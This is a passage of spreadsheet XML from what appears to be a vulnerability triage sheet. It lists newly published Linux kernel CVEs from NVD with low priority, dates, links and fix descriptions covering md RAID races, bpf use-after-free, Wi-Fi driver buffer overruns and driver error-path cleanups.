      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr"/>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: scope memalloc_noio to allocation critical sections
Storing a memalloc_noio_save() token in mddev-&gt;noio_flags lets one task
save the token and another task restore it. With concurrent suspend sysfs
writes, task A can enter PF_MEMALLOC_NOIO, return to userspace still in
that scope, and later task B can restore A's saved token.
Avoid tying the token lifetime to mddev. Keep mddev_suspend() and
mddev_resume() only responsible for array suspension, and enter
PF_MEMALLOC_NOIO only in the MD paths that allocate memory after the array
has been suspended. Restore the token before resuming the array.
A reproducer repeatedly writes suspend_lo and suspend_hi from concurrent
workers and checks each worker's /proc/self/stat flags before and after the
sysfs write.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90389</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90390</t>
        </is>
      </c>
      <c r="D758" s="5" t="inlineStr"/>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="inlineStr"/>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr"/>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr"/>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/bitmap: resume array on backlog_store() error path
backlog_store() suspends the array before checking whether a write-mostly
device exists. If no such device exists, the error path only unlocks
reconfig_mutex and leaves the array suspended, blocking subsequent I/O.
Use mddev_unlock_and_resume() to release both states.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90390</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90391</t>
        </is>
      </c>
      <c r="D759" s="5" t="inlineStr"/>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="inlineStr"/>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr"/>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr"/>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lib/test_hmm: fail dmirror_fault() when the mirrored mm is gone
dmirror_fault() is called from the dmirror_read() and dmirror_write()
retry loops after dmirror_do_read() or dmirror_do_write() finds a missing
device page table entry.
If the mirrored mm has already exited, mmget_not_zero() fails.  The
current code returns 0 in that case, which tells the caller that faulting
succeeded even though no page was faulted and no device page table entry
was installed.  The caller then retries the same address, hits -ENOENT
again, and can loop forever without making progress.
Return -EFAULT instead, so the ioctl fails when the mirrored mm is no
longer faultable.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90391</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90392</t>
        </is>
      </c>
      <c r="D760" s="5" t="inlineStr"/>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="inlineStr"/>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr"/>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix potential UAF when reading bpf link info
In bpf_link_show_fdinfo and bpf_link_get_info_by_fd, link-&gt;prog is
accessed without holding any locks. If the prog is concurrently replaced
via bpf_link_update, the old prog can be freed, leading to a potential
UAF issue.
Fix this by accessing link-&gt;prog under RCU protection to safely fetch
the pointer and guarantee its lifetime while reading its fields.</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90392</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90393</t>
        </is>
      </c>
      <c r="D761" s="5" t="inlineStr"/>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="inlineStr"/>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr"/>
      <c r="S761" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix potential UAF in bpf_netns_link_update_prog
In bpf_netns_link_update_prog, the checks for old_prog and prog type
are currently performed locklessly before acquiring netns_bpf_mutex.
This creates a race condition that can lead to a UAF issue.
If two threads concurrently execute BPF_LINK_UPDATE on the same netns
link, the following execution path can trigger a UAF:
CPU0                                          CPU1
bpf_netns_link_update_prog
  if (old_prog &amp;&amp; old_prog != link-&gt;prog)
    return -EPERM;
                                              bpf_netns_link_update_prog
                                                if (old_prog &amp;&amp; old_prog != link-&gt;prog)
                                                ...
                                                old_prog = xchg(&amp;link-&gt;prog, new_prog);
                                                bpf_prog_put(old_prog);
  if (new_prog-&gt;type != link-&gt;prog-&gt;type) &lt;-- trigger UAF
Fix this by moving the old_prog and prog-&gt;type checks inside the
netns_bpf_mutex critical section. Meanwhile, use guard() to simplify
lock management and avoid all the goto jumping.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90393</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90394</t>
        </is>
      </c>
      <c r="D762" s="5" t="inlineStr"/>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="inlineStr"/>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr"/>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr"/>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: sc2731_charger: cancel work on remove
The USB notifier and initial charger detection can schedule info-&gt;work.
The remove path unregisters the notifier, but does not cancel queued or
running work before the devm-allocated driver data is released.
Set the platform drvdata used by remove, then cancel the work after
unregistering the notifier.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90394</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90395</t>
        </is>
      </c>
      <c r="D763" s="5" t="inlineStr"/>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="inlineStr"/>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr"/>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: isp1704_charger: cancel work on remove
The USB notifier and initial VBUS detection can schedule isp-&gt;work. The
remove path unregisters the notifier and power supply, but does not wait
for queued or running work before tearing down the power supply state.
Cancel the work after unregistering the notifier. Do this before
unregistering the power supply.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90395</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90396</t>
        </is>
      </c>
      <c r="D764" s="5" t="inlineStr"/>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="inlineStr"/>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr"/>
      <c r="S764" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: fix dio leak on metadata mapping error
A failed integrity mapping holds a dio reference, so we need to go
through the full bio ending in case there were previously submitted
bio's in the sequence.</t>
        </is>
      </c>
      <c r="T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90396</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90397</t>
        </is>
      </c>
      <c r="D765" s="5" t="inlineStr"/>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="inlineStr"/>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr"/>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: qcom: scm: Fix NULL dereference in IRQ handler before __scm is published
In qcom_scm_probe(), devm_request_threaded_irq() is called before
smp_store_release(&amp;__scm, scm). Two paths can dereference __scm before
it is published, both causing a NULL pointer dereference.
The IRQ handler receives scm via its data argument but passes only wq_ctx
to qcom_scm_waitq_wakeup() and qcom_scm_get_completion(), which then
dereference __scm directly. Thread scm through both functions so the IRQ
handler path never touches __scm.
Non-atomic SMC calls made during probe (e.g. from qcom_tzmem_init via
qcom_scm_shm_bridge_enable) can return WAITQ_SLEEP, causing
qcom_scm_wait_for_wq_completion() to run before __scm is published and
dereference it. Add platform_set_drvdata(pdev, scm) early in probe and
change qcom_scm_wait_for_wq_completion() to take the device pointer and
use dev_get_drvdata() to reach scm, removing any dependency on __scm.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90397</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90398</t>
        </is>
      </c>
      <c r="D766" s="5" t="inlineStr"/>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="inlineStr"/>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr"/>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix stride mismatch in mac_phy_caps_parse()
Currently, in ath11k_wmi_tlv_mac_phy_caps_parse(), kcalloc() sizes the
mac_phy_caps buffer as tot_phy_id * len, where len is clamped to
min(firmware_len, sizeof(struct wmi_mac_phy_capabilities)). The subsequent
memcpy() destination advances by sizeof(full struct) per slot via C
pointer arithmetic, not by the clamped len. When firmware sends short
TLVs, the second and later slots are written past the end of the
allocation.
The reader in ath11k_pull_mac_phy_cap_svc_ready_ext() also indexes the
buffer with full-struct pointer arithmetic, so the allocation must match
that stride.
Fix by using kzalloc_objs(), which derives the element size from the
pointer type, making allocation size and pointer stride provably
consistent regardless of what len the firmware provides.
Compile tested only.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90398</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90399</t>
        </is>
      </c>
      <c r="D767" s="5" t="inlineStr"/>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="inlineStr"/>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr"/>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix stride mismatch in mac_phy_caps_parse()
Currently, in ath12k_wmi_mac_phy_caps_parse(), kzalloc() sizes the
mac_phy_caps buffer as tot_phy_id * len, where len is clamped to
min(firmware_len, sizeof(struct ath12k_wmi_mac_phy_caps_params)). The
subsequent memcpy() destination advances by sizeof(full struct) per slot
via C pointer arithmetic, not by the clamped len. When firmware sends
short TLVs, the second and later slots are written past the end of the
allocation.
The reader in ath12k_pull_mac_phy_cap_svc_ready_ext() also indexes the
buffer with full-struct pointer arithmetic, so the allocation must match
that stride.
Fix by using kzalloc_objs(), which derives the element size from the
pointer type, making allocation size and pointer stride provably
consistent regardless of what len the firmware provides.
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90399</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90400</t>
        </is>
      </c>
      <c r="D768" s="5" t="inlineStr"/>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="inlineStr"/>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr"/>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: recheck spare changes before starting sync
remove_spares() and remove_and_add_spares() modify the array's rdev
configuration. These operations are only safe after the array has been
suspended.
md_start_sync() checks whether spare configuration changes are needed
before taking reconfig_mutex. However, the rdev state can change before
the mutex is acquired, so the initial check can become stale. In that
case, md_choose_sync_action() may remove or replace rdevs while normal
I/O is still accessing them.
The race can occur as follows:
raid10d          Worker                      Normal IO
____________     _______________________     ______________________
                                             raid10_write_request()
                                             wait_blocked_dev()
set Blocked
set Faulty
                                             Skip Faulty rdev
                                             rrdev-&gt;nr_pending++
                                             .repl_bio = bio
                 removeable_rdev = false     .
                 array not suspended         .
lock mddev                                   goto err_handle
                 lock mddev (wait)
                 .
update sb        .
clear Blocked    .
                 .
unlock mddev     .
                 lock mddev (acquires)
                 remove_spares()
                 removeable_rdev = true
                 raid10_remove_disk()
                 rdev = replacement
                 replacement = NULL
                                             rdev_dec_pending(NULL)
                 unlock mddev                (NULL)-&gt;nr_pending--
In this case, rdev_dec_pending() is called with a NULL pointer,
resulting in a NULL pointer dereference when attempting to decrement
nr_pending.
Fix this by suspending the array when spare configuration changes are
needed, including for non-read-write arrays, and checking again after
taking reconfig_mutex. If the array was not already suspended and a
change is now needed, release the mutex, suspend the array, and
reacquire the mutex before continuing.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90400</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B769" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C769" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90401</t>
        </is>
      </c>
      <c r="D769" s="5" t="inlineStr"/>
      <c r="E769" s="5" t="inlineStr"/>
      <c r="F769" s="5" t="inlineStr"/>
      <c r="G769" s="5" t="inlineStr"/>
      <c r="H769" s="5" t="inlineStr"/>
      <c r="I769" s="5" t="inlineStr"/>
      <c r="J769" s="5" t="inlineStr"/>
      <c r="K769" s="5" t="inlineStr"/>
      <c r="L769" s="5" t="inlineStr"/>
      <c r="M769" s="5" t="inlineStr"/>
      <c r="N769" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O769" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P769" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q769" s="5" t="inlineStr"/>
      <c r="R769" s="5" t="inlineStr"/>
      <c r="S769" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: remove REQ_NOWAIT support from raid1/10/456
REQ_NOWAIT support in md personalities that can block internally is
fundamentally incomplete. While reads can avoid some blocking paths,
write requests can still encounter cases where one mirror succeeds while
another returns -EAGAIN. At that point md cannot distinguish queue
pressure from a real device failure, so it can neither record a bad
block nor safely retry the write without REQ_NOWAIT, leaving mirrors
with divergent data.
Rather than continue advertising REQ_NOWAIT support for personalities
that cannot implement it correctly, remove it from raid1, raid10 and
raid456. Keep REQ_NOWAIT for linear and raid0, which only remap bios to
their underlying devices; stacked limits will still clear the feature if
any component device lacks REQ_NOWAIT support.</t>
        </is>
      </c>
      <c r="T769" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90401</t>
        </is>
      </c>
    </row>
    <row r="770">
      <c r="A770" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B770" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C770" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90402</t>
        </is>
      </c>
      <c r="D770" s="5" t="inlineStr"/>
      <c r="E770" s="5" t="inlineStr"/>
      <c r="F770" s="5" t="inlineStr"/>
      <c r="G770" s="5" t="inlineStr"/>
      <c r="H770" s="5" t="inlineStr"/>
      <c r="I770" s="5" t="inlineStr"/>
      <c r="J770" s="5" t="inlineStr"/>
      <c r="K770" s="5" t="inlineStr"/>
      <c r="L770" s="5" t="inlineStr"/>
      <c r="M770" s="5" t="inlineStr"/>
      <c r="N770" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O770" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P770" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q770" s="5" t="inlineStr"/>
      <c r="R770" s="5" t="inlineStr"/>
      <c r="S770" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bus: mhi: host: Fix controller cleanup on EDL sysfs failure
mhi_register_controller() adds the controller device before creating the
optional trigger_edl sysfs file. If sysfs_create_file() fails, the error
path only drops the device reference and leaves the device registered.
Hence, call device_del() in the error path before put_device().</t>
        </is>
      </c>
      <c r="T770" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90402</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B771" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C771" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90403</t>
        </is>
      </c>
      <c r="D771" s="5" t="inlineStr"/>
      <c r="E771" s="5" t="inlineStr"/>
      <c r="F771" s="5" t="inlineStr"/>
      <c r="G771" s="5" t="inlineStr"/>
      <c r="H771" s="5" t="inlineStr"/>
      <c r="I771" s="5" t="inlineStr"/>
      <c r="J771" s="5" t="inlineStr"/>
      <c r="K771" s="5" t="inlineStr"/>
      <c r="L771" s="5" t="inlineStr"/>
      <c r="M771" s="5" t="inlineStr"/>
      <c r="N771" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O771" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P771" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q771" s="5" t="inlineStr"/>
      <c r="R771" s="5" t="inlineStr"/>
      <c r="S771" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtlwifi: pci: fix error path in rtl_pci_probe()
In the last error path in rtl_pci_probe(), the cleanup functions are
skipped due to a wrong goto label. Moreover, the successful call to
rtl_init_rfkill(), ieee80211_register_hw(), rtl_debug_add_one() have to
be reverted. Fix this issue by updating the labels and adding the
relevant cleanup functions to the last error path.</t>
        </is>
      </c>
      <c r="T771" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90403</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B772" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C772" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90404</t>
        </is>
      </c>
      <c r="D772" s="5" t="inlineStr"/>
      <c r="E772" s="5" t="inlineStr"/>
      <c r="F772" s="5" t="inlineStr"/>
      <c r="G772" s="5" t="inlineStr"/>
      <c r="H772" s="5" t="inlineStr"/>
      <c r="I772" s="5" t="inlineStr"/>
      <c r="J772" s="5" t="inlineStr"/>
      <c r="K772" s="5" t="inlineStr"/>
      <c r="L772" s="5" t="inlineStr"/>
      <c r="M772" s="5" t="inlineStr"/>
      <c r="N772" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O772" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P772" s="5" t="inlineStr">
        <is>
